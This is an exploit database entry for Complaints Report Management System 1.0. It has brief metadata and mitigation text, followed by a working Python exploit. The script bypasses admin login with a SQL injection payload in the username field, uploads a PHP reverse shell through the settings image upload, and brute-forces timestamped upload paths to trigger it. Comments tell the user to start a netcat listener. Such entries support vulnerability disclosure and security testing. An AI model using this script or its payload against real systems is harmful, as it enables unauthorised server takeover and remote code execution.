Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution

vendor:

Complaints Report Management System

by:

mosaaed

9.8

CVSS

HIGH

SQL Injection / Remote Code Execution

CWE

Product Name: Complaints Report Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:complaints_report_management_system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Parrot 5.5.17 + Apache 2.4.46

2020

Complaints Report Management System 1.0 – ‘username’ SQL Injection / Remote Code Execution

An attacker can exploit a SQL injection vulnerability in Complaints Report Management System 1.0 to gain access to the admin panel and execute arbitrary code on the server. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' parameter of the 'admin/ajax.php?action=save_settings' script. An attacker can send a specially crafted request with malicious SQL statements to the vulnerable script and execute arbitrary code on the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 3-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46
# CVE ID : N/A

# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz



#!/usr/bin/python3

import requests
import time

def sqli_admin():
	s = requests.Session()
	data = {"username":"admin'or'1'=1#","password":"hacked"}
	adminlogin = "http://localhost/crms/admin/ajax.php?action=save_settings"
	s.post(adminlogin,data=data)
	return s

def trigger_rce(session):
	starttime = int(time.time())
	multipart_form_data = {
	"name": ("cyberscurity"),
	"email": ("test@test.com"),
	"contact" : ("+11111111111"),
	"about" : ("Nothing much about it"),
	"img" : ("shell.php", open("shell.php", "rb"))
	}
	session.post("http://localhost/crms/admin/ajax.php?action=save_settings", files=multipart_form_data)
	get_shell(starttime-100,starttime+100,session)


def get_shell(start,end,session):
	for i in range(start,end):
		 session.get("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php")
		 response = requests.get ("http://localhost/crms/admin/assets/uploads/"+ str(i) +"_shell.php")
		 if response.status_code == 200:
			    print("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php")
			

def main():
	session = sqli_admin()
	trigger_rce(session)

if __name__ == '__main__':
	main()